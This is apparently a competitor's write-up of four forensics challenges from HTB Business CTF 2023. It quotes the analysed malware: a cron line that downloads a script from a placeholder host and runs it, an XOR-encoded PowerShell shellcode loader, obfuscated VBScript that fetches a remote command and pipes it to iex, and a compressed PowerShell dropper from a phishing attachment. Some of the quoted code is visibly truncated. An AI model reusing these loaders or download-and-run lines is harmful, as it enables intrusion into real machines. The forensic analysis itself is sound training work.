HTB Business CTF 2023: The Great Escape
Forensics
Red Miners
In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor's miner's installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor's desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defences to counter future threats.
Looking at the Bash file, my first thought is to search for HTB since that's typically part of their flag format. One hit is this line:
local url="http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg=="
Using CyberChef on the base64 portion of the string, we get the following:
part2="_th31r_w4y"
We do the same thing with this line:
echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
Which gives us:
part1="HTB{m1n1ng"
Those are the only relevant portions mentioning HTB, so next I looked for more base64 usage and found this:
dest=$(echo "X3QwX200cnN9Cg=="|base64 -d)
Which decodes to the final part of the flag:
_t0_m4rs}
Answer: HTB{m1n1ng_th31r_w4y_t0_m4rs}
Scripts and Formulas
After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, the UNZ hired a local geologist to examine possible sites that were used in the past for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. Being new to the job, the clerk wasn't aware of the past situation and opened the Invoice. Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! Given some Logs from the Clerk's Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access! To get the flag you need to answer the questions from the docker instance.
forensics_scripts_and_formulas
After spawning the Docker instance and connecting with nc 83.136.251.112 30317, we get the first question:
- What program is being copied, renamed, and what is the final name? (Eg: notepad.exe:picture.jpeg)
I used PowerShell to do this instead of the Windows Event Viewer GUI. After messing around with it for a while, I came up with the following:
$FormatEnumerationLimit = -1
$OutputFile = "./_matching_events.log"
$WindowWidth = $Host.UI.RawUI.BufferSize.Width
# Delete the file if it exists
if (Test-Path -Path $OutputFile) {
Remove-Item -Path $OutputFile
}
Get-WinEvent -Path .\* | foreach {
if ($_.Message -match '(copy|rename)') {
$EventProperties = @{
TimeCreated = $_.TimeCreated
EventID = $_.Id
Message = $_.Message
ApplicationName = $_.Properties[0].Value
FilePath = $_.Properties[1].Value
}
$EventProperties | Format-List | Out-String | Out-File -Append -FilePath $OutputFile
Add-Content -Path $OutputFile -Value ("=" * $WindowWidth)
}
}
The output had one bit that was pretty interesting right off the bat for event ID 4104:
Creating Scriptblock text (1 of 1):
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {
$_.GlobalAssemblyCachGetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]]
@('System.Runtime.InteropServices.Haring'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
System.Runtime.InteropSerr_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object
System.Reflection.AssemblyNamestem.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]:aged')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type,
$var_parameteaged')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL7yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hR
c2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCEsplEjIyOoo6sjIyNrpuNXRGsi86hrO3NnqGMDaiLz
wHVuEupr3OpiqBerayL1axLjYuLqLo9iIuIbw1bSbyBvBytmGvJW+3tnqGMHaiLzRWKoL2tnqGM/aiLzYqgnq2si82J7Ynt9enlie2J6
YnlroM8DYnHcw3tienlrqDHKaNzc3H5qnVRQEXwQESMjYnVqqsVros+DIiMjaqrGap8hIzenbmnlF2J3aqrHb6rSYplvVAUk3PZvqslL
IiIjI3pimQqjSCPc9kkpYn1zc24S6m4S42vc42uq4Wvc42uq4mKZySz8w9z2a6rkSTNie2+qwWuq2mKZuoZXQtz2puNXKWrc7VbGy7Aj
IyNroM8za6rBbhLqSSdie2uq2mKZIfrrfNz2oNsjXXZroOcDfarVSWNieksjMyMjYntrqtFrEupimXuHcMbc9muq4Gqq5G4S6mqq02uq
+Wuq2mKZIfrrfNz2oNsjXgt7YnR6SyNjIyNie0kjeWKZKAwsE9z2dHpimVZNbkLc9mrc7cof3NzcayLgawrla6bVVpdi3MR7SSN6auTh
05aBddz2')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va =
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address
kernel3ntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer,
(func_get_deleoid])))
$var_runme.Invoke([IntPtr]::Zero)
ScriptBlock ID: a161d800-a564-40a3-aad8-4f9e02e966f7
There were a lot of irrelevant (to this question) firewall changes being made in the logs, so I changed the if statement to reduce them down to make it easier to manually parse over:
if ($_.Message -match '(copy|rename)' -and $_.Message -notmatch 'Windows Defender Firewall')
I was able to deobfuscate the VBScript code somewhat to get the following:
Function ZbVxxAHCsiTnKpIJ()
Dim yNSlalZeGAsokjsP
Dim pJmLeYiULjageWIP
Dim cMtARTHTmbqbxauA
Dim bZzPBAGNtCswuUoo
Dim QlAtSUbRwRFNlEjX
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfowf("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & LLdunAaXwVgKfowf("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & LLdunAaXwVgKfowf("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" & LLdunAaXwVgKfowf("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & LLdunAaXwVgKfowf(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & LLdunAaXwVgKfowf("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & LLdunAaXwVgKfowf("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & LLdunAaXwVgKfowf("YP7aQTYtE3UaYLX[") & "0" & LLdunAaXwVgKfowf("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & LLdunAaXwVgKfowf("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & LLdunAaXwVgKfowf("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & LLdunAaXwVgKfowf("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & LLdunAaXwVgKfowf("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & LLdunAaXwVgKfowf("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
objShell.Run cMtARTHTmbqbxauA
Function LLdunAaXwVgKfowf(t)
Dim msStr()
ReDim msStr(Len(t))
Dim jKaNZCemSwPDrmLT
jKaNZCemSwPDrmLT = ""
For i = 1 To UBound(msStr)
msStr(i) = Mid(t, i, 1)
Next
For Each qqEPRvFjIuMSmDvM In msStr
If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
Next
LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
End Function
Sub Main()
ZbVxxAHCsiTnKpIJ()
End Sub
Main()
Function ZbVxxAHCsiTnKpIJ()
Dim yNSlalZeGAsokjsP
Dim pJmLeYiULjageWIP
Dim cMtARTHTmbqbxauA
Dim bZzPBAGNtCswuUoo
Dim QlAtSUbRwRFNlEjX
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
yNSlalZeGAsokjsP = GetURL("https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqWYwI6x71z4p2EK88FojrsW2DKbSkx-ro5lQ1lB/1.0/9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & GetString("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & GetString("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & GetString("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=") & GetString("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & GetString(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & GetString("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & GetString("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & GetString("YP7aQTYtE3UaYLX[") & "0" & GetString("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & GetString("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & GetString("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & GetString("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & GetString("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & GetString("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
objShell.Run cMtARTHTmbqbxauA
End Function
Function GetURL(t)
Dim msStr()
ReDim msStr(Len(t))
Dim jKaNZCemSwPDrmLT
jKaNZCemSwPDrmLT = ""
For i = 1 To UBound(msStr)
msStr(i) = Mid(t, i, 1)
Next
For Each qqEPRvFjIuMSmDvM In msStr
If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
Next
GetURL = jKaNZCemSwPDrmLT
End Function
Sub Main()
ZbVxxAHCsiTnKpIJ()
End Sub
Main()
Function ZbVxxAHCsiTnKpIJ()
Dim scriptURL
Dim command
Dim shellCommand
Dim shell
Set shell = CreateObject("WScript.Shell")
scriptURL = "https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqWYwI6x71z4p2EK88FojrsW2DKbSkx-ro5lQ1lB/1.0/9pMoBw7eTrMsDhKeVlOl1.WeMxUe"
command = GetURL(scriptURL)
shellCommand = command & "|iex"
shell.Run shellCommand
End Function
Function GetURL(url)
Dim modifiedURL
Dim i
modifiedURL = ""
For i = 1 To Len(url)
If IsAlphaNumeric(Mid(url, i, 1)) Then
modifiedURL = modifiedURL & Mid(url, i, 1)
End If
Next
GetURL = modifiedURL
End Function
Function IsAlphaNumeric(character)
Dim asciiValue
asciiValue = Asc(character)
If (asciiValue >= 48 And asciiValue <= 57) Or _
(asciiValue >= 65 And asciiValue <= 90) Or _
(asciiValue >= 97 And asciiValue <= 122) Then
IsAlphaNumeric = True
Else
IsAlphaNumeric = False
End If
End Function
ZbVxxAHCsiTnKpIJ()
Hypercraft
This email seems to have come from one of our agents, Axel Knight, but Axel has been missing for weeks, and we believe him to be compromised. The email claims to have information that could be vital to our winning this war, but before we use it, we want to make sure it is safe to open. Analyze the given email and see if it's real, or if it's just the Arodorians trying to phish us, and find the flag.
After opening the EML file with Outlook, we can see that there is an attached HTML file, [TOP SECRET] Arodorian Hypercraft.pdf.html. I opened the file in a browser and it automatically downloaded [TOP SECRET]Hypercraft Plans.zip. The ZIP file contained a JavaScript file, [TOP SECRET] Arodorian Hypercraft.pdf.js.
Decoded PowerShell command from JavaScript:
powershell -execution bypass "iex(New-Object System.IO.Compression.DeflateStream( [System.IO.MemoryStream] [convert]::FromBase64String('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'), [System.IO.Compression.CompressionMode]::DECOMPReSS) | ForEach{New-Object IO.StreamReader( $_, [System.Text.Encoding]::Ascii ) } ).readToEnd( )"
Project Redline
In the aftermath of a mysterious death in the United Nations of Zenium colony on Mars, during the Autopsy, the doctor uncovers a peculiar secret. Traces of a cyber attack are discovered on the victim's cybernetic implants, pointing to a covert infiltration by the Board of Arodor. Determined to reveal the truth, the doctor joins forces with a cyber forensics expert, tracing the attack's origins. As they delve deeper, they uncover a startling revelation. In the implant factory, a worker examined what they thought was leaked footage from Arodors cyber implant research. Unbeknownst to him, the intel was infected with malware, infecting the whole production line. Now, they must race against time to expose cybercriminals and prevent Mars's fragile peace from shattering again.
This one is a bit of a bigger lift to parse through initially, as there are 16475 recorded packets in the capture. Luckily, 16338 (99.2%) are DNS, so we know that's likely how we're going to find the flag. Out of curiosity, I filtered for not dns to see what else there was, and it was all MDNS queries to a linked iPhone. There are a massive number of queries for A records, which is typically indicative of DNS exfil, so I decided to start there.
- The first subdomain, i.e. 6M3iCMhHvXoC8oNGbnbtTJbVfKLsF4nMFqstYU4UowoC8Y5LHJ6TxA95PbBfQ64, is always 64 characters long.
- The first subdomain also only varies slowly over time, i.e. packet 6135 has the same first 7 characters as packet 1173. This makes me believe that it may be a form of encoded timestamp.
- The first 3 subdomains are always 64 characters long, and the 4th is always 17 characters.
We also have memory.raw, which is a 2GB memory dump. I decided to give Volatility 3 a spin to see if we can find anything that will tell us how to decipher the DNS communications:
python3 -m pip install -U distorm3 yara pycrypto pillow openpyxl ujson pytz ipython capstone 2>/dev/null
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
# rm -rf ~/.cache/volatility3/data_*.cache
python3 vol.py -f /mnt/d/Programming/bits-and-bobbles/notes/assets/hackthebox/HTB-Business-CTF-2023/forensics_project_redline/memory.raw windows.pslist.PsList
We can see that the following programs were running:
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0xad81e4479040 152 - N/A False 2023-06-13 22:32:27.000000 N/A Disabled
124 4 Registry 0xad81e45d0040 4 - N/A False 2023-06-13 22:32:23.000000 N/A Disabled
408 4 smss.exe 0xad81e889e040 2 - N/A False 2023-06-13 22:32:27.000000 N/A Disabled
516 504 csrss.exe 0xad81e860c080 11 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
592 504 wininit.exe 0xad81ead2a080 2 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
616 584 csrss.exe 0xad81ead340c0 12 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
696 584 winlogon.exe 0xad81ead66080 5 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
740 592 services.exe 0xad81ead23080 6 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
748 592 lsass.exe 0xad81ead81300 9 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
880 740 svchost.exe 0xad81eade9240 18 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
908 696 fontdrvhost.ex 0xad81eae1c140 5 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
916 592 fontdrvhost.ex 0xad81eae1a140 5 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1004 740 svchost.exe 0xad81eaeab2c0 9 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
504 696 dwm.exe 0xad81eaf0a080 22 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
1028 740 svchost.exe 0xad81eaf68240 57 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1168 740 upfc.exe 0xad81eafc0080 1 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1212 740 svchost.exe 0xad81eafcc2c0 16 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1220 740 svchost.exe 0xad81eafd92c0 8 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1240 740 svchost.exe 0xad81eafdc2c0 13 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1428 740 VBoxService.ex 0xad81ebc7a240 11 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1592 740 svchost.exe 0xad81ebcee280 16 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1684 4 MemCompression 0xad81ebd0e040 42 - N/A False 2023-06-13 12:32:33.000000 N/A Disabled
1816 740 svchost.exe 0xad81ebdee0c0 11 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1892 740 svchost.exe 0xad81ebd0b080 4 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1924 740 svchost.exe 0xad81ebdf62c0 4 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1916 740 svchost.exe 0xad81ebdf22c0 16 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1932 740 svchost.exe 0xad81ebdf42c0 3 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1652 740 spoolsv.exe 0xad81ebdfa0c0 8 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2052 740 svchost.exe 0xad81ebe970c0 13 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2232 740 svchost.exe 0xad81ebea2080 12 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2256 740 MsMpEng.exe 0xad81ebf92340 12 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2620 1028 taskhostw.exe 0xad81ec0b02c0 6 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
2788 740 svchost.exe 0xad81ec12a240 24 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
2976 2620 ngentask.exe 0xad81ec1d6300 5 - 0 True 2023-06-13 12:32:34.000000 N/A Disabled
2992 2620 ngentask.exe 0xad81ec1e1340 12 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
3000 2992 conhost.exe 0xad81ec1e2080 4 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
3032 2976 conhost.exe 0xad81ec1ef200 4 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
